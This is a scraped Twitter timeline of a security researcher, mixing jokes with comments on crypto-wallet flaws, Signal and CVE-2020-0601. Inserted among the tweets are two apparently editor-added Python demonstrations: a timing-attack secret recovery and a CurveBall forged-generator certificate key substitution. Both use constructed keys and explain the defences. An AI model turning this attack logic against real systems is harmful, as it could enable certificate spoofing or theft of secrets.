✨ saleem ✨

@saleemrash1d

Followers
15,613
Following
90
Media
1,032
Statuses
24,066

my job is just beach (and computer security) ✨ he/him

london
Joined July 2015
Pinned Tweet
@saleemrash1d
✨ saleem ✨
9 months
Tweet media one
0
2
13
@saleemrash1d
✨ saleem ✨
3 years
Tweet media one
56
370
3K
@saleemrash1d
✨ saleem ✨
3 years
you are NaN, i'm NaN, we are not the same
20
312
3K
@saleemrash1d
✨ saleem ✨
4 years
CVE-2020-0601
Tweet media one
Tweet media two
26
958
2K
@saleemrash1d
✨ saleem ✨
6 years
Tweet media one
21
495
2K
@saleemrash1d
✨ saleem ✨
4 years
ummm
Tweet media one
31
171
778
@saleemrash1d
✨ saleem ✨
4 years
elon musk to name his next child "bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0wlh"
10
88
638
@saleemrash1d
✨ saleem ✨
4 years
can you take a famous person's iphone into madame tussauds and unlock their faceid?
18
76
569
@saleemrash1d
✨ saleem ✨
4 years
"but our fave low-tech workaround was shared by a user who found out his campus only had 12 wheel boots to go around and bought and illegally parked 12 scrapyard cars that could be “sacrificed” so everyone else could park however they wanted"
5
136
455
@saleemrash1d
✨ saleem ✨
6 years
on a completely unrelated note, here is a @Bitfi6 being cold boot attacked. it turns out that rooting the device does not wipe RAM clean. who would have thought it!? 🎶 i feel this music is very appropriate for @Bitfi6 🎶
24
129
403
@saleemrash1d
✨ saleem ✨
4 years
Tweet media one
Tweet media two
Tweet media three
Tweet media four
7
85
382
@saleemrash1d
✨ saleem ✨
4 years
@kmlefranc this tweet is going to be in your next background check
4
9
361
@saleemrash1d
✨ saleem ✨
6 years
As one of the security researchers, I urge you to update now. This article doesn't make it clear enough how dangerous this issue can be. Potential issues include compromised recovery seed generation or private key extraction.
@Ledger
Ledger
6 years
New firmware update 1.4.1 available for the Nano S!
Tweet media one
252
526
1K
30
234
343
@saleemrash1d
✨ saleem ✨
4 years
took me a second but lmao this is great
@psaffo
Paul Saffo
4 years
Tweet media one
14
137
571
34
37
349
@saleemrash1d
✨ saleem ✨
4 years
@Michael1979 oh, i have been organising my files by storing them on different computers and keeping the computers in a filing cabinet.
4
13
341
@saleemrash1d
✨ saleem ✨
5 years
@johnregehr @matthew_d_green you're not giving the Hacker News commenters enough credit. they've systematically collated the stupidest ways of determining who did the research and that's no easy feat.
1
13
322
@saleemrash1d
✨ saleem ✨
6 years
since Volkswagen partnered with IOTA, will their cars no longer be collision resistant?
19
49
316
@saleemrash1d
✨ saleem ✨
6 years
Evil Maid attack on @Bitfi6 , yet device syncs with dashboard!? did @Bitfi6 lie to us, their loyal customers?? entered a random salt/phrase first time to prove that the computer isn't printing out pre-defined strings
14
99
297
@saleemrash1d
✨ saleem ✨
5 years
asimov's fourth law: a robot must not click the "i am not a robot" checkbox
2
120
248
@saleemrash1d
✨ saleem ✨
6 years
unhackable (adjective) /ʌnˈhakəbl/ 1. (computing) Not hackable; that cannot be hacked or broken into 2. ( @Bitfi6 ) An Evil Maid attack can change the recipient address of your transactions after you approve them video includes 🎶 for your enjoyment 😉
16
86
243
@saleemrash1d
✨ saleem ✨
4 years
Firefox is safe: NSS doesn't accept the certificate. Chrome is fooled by the certificate, but it throws NET::ERR_CERTIFICATE_TRANSPARENCY_REQUIRED. will need to investigate.
Tweet media one
6
55
226
@saleemrash1d
✨ saleem ✨
6 years
@gummatt @0xEval @LedgerHQ Well, I am 15. I don't believe you need lots of experience to find security vulnerabilities.
9
34
204
@saleemrash1d
✨ saleem ✨
3 years
every time you sneak a wrong answer past recaptcha you buy humanity a little more time
5
61
210
@saleemrash1d
✨ saleem ✨
6 years
@nscrutables @matthew_d_green ok i'm not going to apologize for who i am
Tweet media one
3
35
206
@saleemrash1d
✨ saleem ✨
6 years
Idea: Twitter bot that detects screenshots with low batteries and reminds people to charge their phone
13
20
204
@saleemrash1d
✨ saleem ✨
6 years
Never write off security mechanisms because they aren't perfect. Unless they have serious downsides, err on the side of "defense in depth".
4
36
199
@saleemrash1d
✨ saleem ✨
6 years
do you believe in coincidences?
Tweet media one
Tweet media two
18
38
191
@saleemrash1d
✨ saleem ✨
4 years
Signal has been nagging me to "Create a PIN".. but for what? at first i assumed it was for an additional layer of protection on local data, but on a close re-read, it seems to be for data that Signal is storing on their servers.. 🤔
Tweet media one
Tweet media two
12
40
198
@saleemrash1d
✨ saleem ✨
4 years
i've written a working exploit for sudo vulnerability CVE-2019-18634. if you have "Defaults pwfeedback" (apparently the default in Linux Mint and derivatives), any user can become root without any password, even if they're not in /etc/sudoers
5
67
193
@saleemrash1d
✨ saleem ✨
6 years
EOS block producing stopped, all the Block Producers had a conference call, chain will be back online in 3-6 hours h/t @karel_3d
19
53
176
@saleemrash1d
✨ saleem ✨
4 years
sneak peek of july 2020
2
86
181
@saleemrash1d
✨ saleem ✨
3 years
the whole "it's extremely difficult for us to verify that this kernel patch isn't malicious" business is a real indictment of C
@FiloSottile
Filippo Valsorda @filippo.abyssdomain.expert
3 years
Possibly unpopular opinion, but I feel like "only merge things after verifying they are valid" should maybe be the default policy of the most used piece of software in the world.
Tweet media one
12
46
395
6
13
184
@saleemrash1d
✨ saleem ✨
6 years
Lightning is actually Layer 2 and Layer 3, in my opinion. Layer 2 is P2P payment channels backed by HTLCs. Layer 3 is onion routing backed by payment channels.
9
46
174
@saleemrash1d
✨ saleem ✨
4 months
@whitequark @FFmpeg (btw thank you so much for this, for ~reasons~ i needed a net stack i could compile to eBPF and this worked *perfectly*, was amazing how easily i could be serving HTTP from an eBPF program talking raw ethernet)
11
12
183
@saleemrash1d
✨ saleem ✨
5 years
@virginmedia @_Freakyclown_ it's illegal to use someone else's account, so why do you have passwords?
2
1
166
@saleemrash1d
✨ saleem ✨
5 years
@Michael1979 nope, you were *actually* invited to a party! you just need to work on not getting uninvited next time.
1
0
159
@saleemrash1d
✨ saleem ✨
4 years
thanks to @CiPHPerCoder 's hint :) the biggest constraints are Chrome's tight certificate policies and that the root CA must be cached, which you can trigger by visiting a legitimate site that uses the certificate
Tweet media one
8
37
157
@saleemrash1d
✨ saleem ✨
5 years
@gtmcknight @hennichodernich @Timcammm it's the same here, but we also have our sort code (routing number) and account number on most debit cards. and the Faster Payments Service means you receive these transfers in minutes rather than days.
4
2
162
@saleemrash1d
✨ saleem ✨
6 years
could @Bitfi6 explain what the com.adups.fota app included with the wallet does? the only information i could find is that it is malicious spyware found on Chinese phones. thanks in advance!
5
37
155
@saleemrash1d
✨ saleem ✨
6 years
non-interactive zero-knowledge proofs like zk-SNARKs are making people anti-social. bring back interactive zero-knowledge proofs to ensure provers build friendships with their verifiers.
3
33
153
@saleemrash1d
✨ saleem ✨
6 years
hey @Bitfi6 , where is the kernel source code for your device? if you refuse to provide it, you're in violation of the GPL license.
4
16
153
@saleemrash1d
✨ saleem ✨
5 years
having spent 4 years mastering twitter, i've learned that responding with logical arguments is almost always a futile endeavour that can be manipulated to reflect badly on you. the only correct approach in such a situation is to troll your opponent into oblivion.
7
19
146
@saleemrash1d
✨ saleem ✨
5 years
the issue with Libra is that Facebook's reach in developing countries means it (and the lack of privacy that comes with it) will be forced upon the unbanked and this is making me incredibly angry
4
40
142
@saleemrash1d
✨ saleem ✨
5 years
at the risk of oversimplifying the situation, i don't like the "here's how i convinced my family/friends to use Signal" threads because it would not actually be difficult to get less technical-minded friends and family to use Signal if @signalapp actually _wanted_ them to use it
11
29
147
@saleemrash1d
✨ saleem ✨
6 years
@SwiftOnSecurity "wow, they can fit a microcontroller into this?"
0
3
142
@saleemrash1d
✨ saleem ✨
4 years
@DiarioBitcoin that part is not a mistake, it is by design; it's supposed to take the same amount of time to avoid revealing information about the secret it's checking
4
2
142
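An added illustration of the point made in the reply above (this is editor-supplied example code, not the author's or any wallet vendor's): a secret comparison that bails out at the first differing byte leaks how long the matching prefix was, and that leak alone is enough to recover the secret one byte at a time. Wall-clock timing is noisy, so the two comparators below count the byte comparisons they perform instead; the 16-byte tag, the padding strategy and the oracle interface are all constructed for the example.

```python
"""Early-exit versus constant-time comparison of a secret value.  The
comparators return (equal, bytes_examined); the "examined" count stands in
for the execution time an attacker would measure over the network."""
import hmac

SECRET_TAG = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")  # constructed


def naive_compare(a, b):
    """Stops at the first mismatch, so its cost depends on the secret."""
    if len(a) != len(b):
        return False, 0
    examined = 0
    for x, y in zip(a, b):
        examined += 1
        if x != y:
            return False, examined
    return True, examined


def constant_time_compare(a, b):
    """Examines every byte and accumulates the XOR, so the cost only depends
    on the length; this is the shape of hmac.compare_digest."""
    if len(a) != len(b):
        return False, 0
    diff = 0
    for x, y in zip(a, b):
        diff |= x ^ y
    return diff == 0, len(a)


def stdlib_compare(a, b):
    """What production code should call instead of rolling its own."""
    return hmac.compare_digest(a, b)


def recover_secret(oracle, length):
    """Attacker: for each position try all 256 values, pad the rest with
    zeros, and keep the guess whose comparison 'took longest'.  A full match
    (the equality result) settles the final byte."""
    known = bytearray()
    for pos in range(length):
        best_byte, best_cost = 0, -1
        for guess in range(256):
            candidate = bytes(known) + bytes([guess]) + bytes(length - pos - 1)
            equal, cost = oracle(SECRET_TAG, candidate)
            if equal:
                best_byte = guess
                break
            if cost > best_cost:
                best_byte, best_cost = guess, cost
        known.append(best_byte)
    return bytes(known)


if __name__ == "__main__":
    print("early-exit  :", recover_secret(naive_compare, 16).hex())
    print("constant    :", recover_secret(constant_time_compare, 16).hex())
    print("true secret :", SECRET_TAG.hex())
```

Against `naive_compare` the attacker needs at most 256 queries per byte; against `constant_time_compare` every wrong guess costs the same, so the search degenerates to picking the first candidate and never converges. In real code the check is the same "always do all the work" rule, and the right call is `hmac.compare_digest` rather than a hand-rolled loop that the interpreter or compiler might shortcut.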
@saleemrash1d
✨ saleem ✨
4 years
@SwiftOnSecurity @kennwhite hey, the Windows Store is a fast, accessible, trusted distribution method! all you have to do is install Ubuntu from the Windows Store and you can use apt-get!
3
19
140
@saleemrash1d
✨ saleem ✨
3 months
@mycoliza the NSA avoids this situation by starting their backdoors by hitting the ALU with the CPU equivalent of the konami code, which triggers a secret CPU feature to make the current process run abt ~500ms faster
2
2
135
@saleemrash1d
✨ saleem ✨
6 years
In case it wasn't clear, score another one for me :) The article refers to another security vulnerability I found in the Ledger. It is fixed in 1.4.2 and users aren't at risk.
@Ledger
Ledger
6 years
Our Bounty Program has made a big impact since it launched - thanks to all contributors so far, congrats to the first awardees Saleem Rashid ( @spudowiar ), Timothée Isnard & Sergei Volokitin! We’re improving how the Program works & making our terms clearer:
11
31
127
10
13
128
@saleemrash1d
✨ saleem ✨
6 years
if you have a Class and a SecureClass, did you really not consider that it should really be InsecureClass and Class?
2
28
132
@saleemrash1d
✨ saleem ✨
6 years
thought i had turned my @Bitfi6 off, but it had still been on for hours. even though it was forcefully updated to V89 by @Bitfi6 , in which they attempt to use SecureString to erase the passphrase and salt from RAM, my keys were still recoverable hours later! i'm shocked! 😱😱😱
Tweet media one
9
31
122
@saleemrash1d
✨ saleem ✨
4 years
@AuroraPenguin that's the mistake: indexOf doesn't get the character at index i (that'd be charAt), it just returns the index of the first occurrence of the character
2
0
123
@saleemrash1d
✨ saleem ✨
4 years
even though Chrome is using BoringSSL, it delegates to CryptoAPI for certificate verification, like lots of other software
2
27
120
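The CVE-2020-0601 tweets above (the one just above about Chrome delegating certificate verification to CryptoAPI, and the earlier ones about NSS rejecting the certificate, Chrome's Certificate Transparency error, and the root CA needing to be cached) all turn on one piece of elliptic-curve arithmetic. The following is an added, editor-supplied walk-through of that arithmetic on real P-256 in pure Python; it is not code from the tweets, from Microsoft, or from any public proof of concept. The root key, attacker key, nonce and "certificate" dictionaries are constructed stand-ins, and the two `*_root_match` functions are a deliberately simplified model of the pre- and post-patch comparison, not CryptoAPI's actual code.

```python
"""Key substitution behind CVE-2020-0601 ("CurveBall") on P-256.  Before the
fix, CryptoAPI matched a chain to a cached trusted root by comparing the
public-key point but not the explicit EC parameters carried in the
certificate, so an attacker who knew the root's public key Q could choose a
private key d' and publish a generator G' = d'^-1 * Q, which makes d' * G' == Q."""
import hashlib

# P-256 (secp256r1) domain parameters, FIPS 186-4.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
P256 = {"p": P, "a": A, "b": B, "n": N, "G": G}

def is_on_curve(pt):
    x, y = pt
    return (y * y - x * x * x - A * x - B) % P == 0

def point_add(p1, p2):
    """Affine point addition; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)

def scalar_mul(k, pt):
    """Double-and-add (not side-channel safe; fine for an illustration)."""
    result, addend = None, pt
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result

def hash_int(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N

def ecdsa_sign(msg, d, gen, k):
    """Textbook ECDSA over generator `gen`; k is passed in so the example is
    deterministic (a real signer must draw a fresh random k per signature)."""
    r = scalar_mul(k, gen)[0] % N
    s = pow(k, -1, N) * (hash_int(msg) + r * d) % N
    return (r, s)

def ecdsa_verify(msg, sig, Q, gen):
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    w = pow(s, -1, N)
    R = point_add(scalar_mul(hash_int(msg) * w % N, gen), scalar_mul(r * w % N, Q))
    return R is not None and R[0] % N == r

def forge_generator(Q, d_fake):
    """G' with d_fake * G' == Q.  Q has prime order N, so invert d_fake mod N."""
    return scalar_mul(pow(d_fake, -1, N), Q)

def vulnerable_root_match(cert_spki, trusted_spki):
    """Model of the pre-patch behaviour: only the public-key point is compared."""
    return cert_spki["Q"] == trusted_spki["Q"]

def fixed_root_match(cert_spki, trusted_spki):
    """Model of the post-patch behaviour: explicit parameters must equal the named curve."""
    return cert_spki["curve"] == trusted_spki["curve"] and cert_spki["Q"] == trusted_spki["Q"]

def demo():
    # Constructed keys.  The real root's private key stays secret; the attacker
    # only needs Q, which every trusted CA publishes in its certificate.
    d_root = hash_int(b"constructed root private key")
    Q = scalar_mul(d_root, G)
    d_fake = hash_int(b"constructed attacker private key")
    G_fake = forge_generator(Q, d_fake)
    trusted = {"curve": P256, "Q": Q}                 # what the OS has cached
    rogue = {"curve": dict(P256, G=G_fake), "Q": Q}   # what the attacker's chain carries
    msg = b"constructed leaf certificate TBS bytes"
    sig = ecdsa_sign(msg, d_fake, G_fake, k=hash_int(b"constructed nonce"))
    return {
        "forged_key_matches_Q": scalar_mul(d_fake, G_fake) == Q,
        "verifies_under_rogue_params": ecdsa_verify(msg, sig, Q, G_fake),
        "verifies_under_real_P256": ecdsa_verify(msg, sig, Q, G),
        "vulnerable_match": vulnerable_root_match(rogue, trusted),
        "fixed_match": fixed_root_match(rogue, trusted),
    }
```

Run `demo()` and the rogue chain verifies under its own parameters and passes the point-only match, but fails both the real P-256 verification and the parameter-aware match. This is also why the tweets' observations line up: the trusted root's Q has to already be in the verifier's cache for the point comparison to hit (hence "the root CA must be cached"), NSS never accepts explicitly encoded curve parameters so Firefox was unaffected, and Chrome's Certificate Transparency requirement caught the forged chain even though CryptoAPI had accepted it. The general defence is the one the fix applied: treat any explicit EC parameters in a certificate as untrusted and either reject them or require them to equal the named curve byte for byte.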
@saleemrash1d
✨ saleem ✨
4 years
reminder that British plugs are better than your plugs
Tweet media one
26
20
121
@saleemrash1d
✨ saleem ✨
4 years
Tweet media one
2
12
108
@saleemrash1d
✨ saleem ✨
6 years
TIL: the VW Beetle used the spare tire to provide air pressure for the windshield washer system 😂😂😂
Tweet media one
9
37
114
@saleemrash1d
✨ saleem ✨
5 years
the other side of this coin is that they're pitching this to privacy extremists, yet still have a hard requirement on a mobile phone number. i cannot emphasise enough how poor this is. the demographic of users that Signal works for is minuscule. i reside in it, but only barely.
6
14
116
@saleemrash1d
✨ saleem ✨
5 years
@matthew_d_green legit question for intel engineers - how do i stop the 30-50 feral bytes of secret information that run into my GPU shared memory within 3-5 cycles while my SGX enclave runs?
2
18
114
@saleemrash1d
✨ saleem ✨
4 years
i cannot believe that tests never caught this. this is both hilarious and horrifying
4
3
114
@saleemrash1d
✨ saleem ✨
6 years
@troyhunt if it's not a negotiation, how do the client and server decide what ciphersuite to use? 🤔
3
1
114
@saleemrash1d
✨ saleem ✨
4 years
if you want to make harmful, untrue claims about end-to-end encryption that a lot of people rely on and frighten people unnecessarily, the *least* you could do is read the page that you link to at the top of your post?
Tweet media one
7
23
113
@saleemrash1d
✨ saleem ✨
6 years
i'm dying 😂😂😂
@TheBitfi
hgtp://Bitfi
6 years
@ryancdotorg @Marsmensch Hi Ryan, the person who was handling this Twitter account has now been dismissed because of many cocky & insulting remarks to smart researchers that we have a lot to learn from. Would it be ok if we contact you? We could use some help to address any potential weaknesses.
15
18
96
9
13
109
@saleemrash1d
✨ saleem ✨
6 years
1. Install uBlock 2. Right click "Trends for you" 3. Click "Block element" 4. Enjoy inner peace
2
17
106
@saleemrash1d
✨ saleem ✨
6 years
Bill Powell of @Bitfi6 discussing the single assumption upon which the entirety of @Bitfi6 's ridiculous UNHACKABLE claim lies. could you even IMAGINE if this assumption was proved false?
Tweet media one
4
25
101
@saleemrash1d
✨ saleem ✨
5 years
@matthew_d_green the future is public static void
1
16
100
@saleemrash1d
✨ saleem ✨
3 years
incredibly disappointing to see you stealing the name of open source software that has been solving this problem for years and probably does a much better job. there's no way this was unintentional 👎
@feross
Feross
3 years
🤩 Exciting news! I'm ready to share the project I've been working on for the past 2 months. ✨ Wormhole – the fastest way to send files ✨ Wormhole lets you share files with end-to-end encryption and it's super fast. Send a file in just 2 seconds:
137
512
3K
6
31
102
@saleemrash1d
✨ saleem ✨
6 years
While WSL *emulates* the Linux kernel interface, it actually runs the GNU system. "What you're referring to as Windows Subsystem for Linux, is in fact, GNU/Windows, or as I've recently taken to calling it, GNU plus Windows."
4
23
101
@saleemrash1d
✨ saleem ✨
3 years
dunno why people think ECC RAM is a good idea. yes, it reduces errors but it's going to be really slow doing all those elliptic curve cryptographic operations.
2
9
104
@saleemrash1d
✨ saleem ✨
6 years
In case your day was going well, here's a bundled FTP client in libxml2:
Tweet media one
7
61
104
@saleemrash1d
✨ saleem ✨
2 years
Tweet media one
3
0
97
@saleemrash1d
✨ saleem ✨
2 years
@moyix damn i’m gonna wake up on monday and find out i’ve been laid off and replaced by ChatGPT
0
0
102
@saleemrash1d
✨ saleem ✨
6 years
Bitfi want you to put your life savings on their device, even though they don't even trust $250k of their own funds on it
@TheBitfi
hgtp://Bitfi
6 years
@spudowiar We may take you up on that but I have to speak to management. And also for this it would likely be a lower amount than $250k.
3
0
1
3
19
98
@saleemrash1d
✨ saleem ✨
6 years
Fun fact: An IOTA node will randomly drop 2% of transactions.
Tweet media one
9
13
89
@saleemrash1d
✨ saleem ✨
6 years
People on Reddit are questioning if I even EXIST.
21
2
82
@saleemrash1d
✨ saleem ✨
5 years
a fragmented disk in its natural habitat
@simongerman600
Simon Kuestenmacher
5 years
I find the Panama Canal endlessly fascinating. I’m very glad that a crew member of this ship brought along his drone to shoot this epic photo. Source:
Tweet media one
70
2K
5K
1
21
88
@saleemrash1d
✨ saleem ✨
3 years
@jam1garner @mycoliza not to be confused with the "cat" coreutils command which shows you the lines of code that a feline would hiss at
0
4
88
@saleemrash1d
✨ saleem ✨
6 years
I know this is a stretch, but what if companies tried to be nice to security researchers?
6
8
89
@saleemrash1d
✨ saleem ✨
6 years
@FiloSottile @bascule since consensus is decided by the COO, it would be far more efficient to simply send transactions to it directly. then we could, i don't know, switch the DAG to a more efficient storage mechanism such as a MySQL database. that would allow us to remove all these unnecessary "nodes"
3
2
86
@saleemrash1d
✨ saleem ✨
6 years
Tweet media one
2
6
85
@saleemrash1d
✨ saleem ✨
5 years
@benadida @matthew_d_green i have deep respect and fear for VirtualBox, the only software that can relentlessly find new and exciting ways to break my peripherals
1
2
83
@saleemrash1d
✨ saleem ✨
5 years
is the 737 MAX going to be a case study for teaching ethics in software engineering in the future?
7
17
86
@saleemrash1d
✨ saleem ✨
6 years
if you send me 500 ETH, i might send you 0.5 ETH back
3
6
83
@saleemrash1d
✨ saleem ✨
6 years
still @Bitfi6 have neither responded to me nor to any of the other researchers involved. meanwhile, they're privately promising customers the issue will be fixed in a firmware update. alas, this is a promise they cannot keep.
5
13
80
@saleemrash1d
✨ saleem ✨
3 years
@mycoliza @ManishEarth @__femb0t this reminds me of an awful joke i heard once "this butter is very good" "it's actually ghee" "ah, thanks for clarifying"
2
21
85
@saleemrash1d
✨ saleem ✨
6 years
@sublimemarch @aloria "look, it's not OUR fault we don't know how to address you" "ok, we made you some stickers to make your life easy" "stop overcomplicating everything for us!"
1
7
79
@saleemrash1d
✨ saleem ✨
3 years
this is truly galaxy brain, absolutely incredible
Tweet media one
2
18
81
@saleemrash1d
✨ saleem ✨
4 years
@SwiftOnSecurity there's actually no way of telling if "the Emperor of Bitcoin" is a joke or not and it's deeply concerning me
4
0
77
@saleemrash1d
✨ saleem ✨
4 months
@whitequark @FFmpeg the only change i had to make was adding an #[inline] to one of the TCP option functions (bc it had more than 5 arguments and the eBPF ABI doesn’t support that)
2
0
83
@saleemrash1d
✨ saleem ✨
6 years
⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠  ⁠
9
28
77
@saleemrash1d
✨ saleem ✨
6 years
i would love to discuss this with your CEO, but unfortunately he deleted his Twitter account
@TheBitfi
hgtp://Bitfi
6 years
@spudowiar Saleem, we are glad that you are making progress with the bounty. Please send the device to us so we can check how it works and if it meets the conditions for Bounty 2 we will immediately make payment to you (or give to charity of your choice). Please contact support@bitfi.com
6
0
14
2
10
78
@saleemrash1d
✨ saleem ✨
6 years
"when we said unhackable, we meant it withstands the force of a commercially available axe"
6
3
75
@saleemrash1d
✨ saleem ✨
4 years
@matthew_d_green clearly they're telling you it's a JPEG, not a RAW
2
3
78
@saleemrash1d
✨ saleem ✨
5 years
@matthew_d_green what can you expect when you combine the two applications with the worst UX in the history of computing: email and PGP
1
2
80
@saleemrash1d
✨ saleem ✨
6 years
i feel BETRAYED. first @Bitfi6 tell me there's no storage and RAM, then they say that the latest update will erase the keys from RAM. but now i find out that the keys stay in RAM for hours!? what next, this device ISN'T unhackable?
2
8
70
@saleemrash1d
✨ saleem ✨
6 years
EOS holders arguing that "Bitcoin had issues" is a fallacy • Bitcoin never had this volume of issues or in such a short space of time • this argument boils down to "we don't learn from past mistakes" which isn't a good thing
3
9
72
@saleemrash1d
✨ saleem ✨
6 years
I'm hearing from multiple sources that @LedgerHQ are pushing the ridiculous narrative that I have some sort of affiliation with @TREZOR . This is a pathetic attempt to undermine my integrity, by claiming that I am not "independent". 1/
9
13
78
@saleemrash1d
✨ saleem ✨
6 years
@Bitfi6 i don't need to call either your CEO or CTO for you to point me in the direction of your kernel source code. thanks in advance!
1
1
75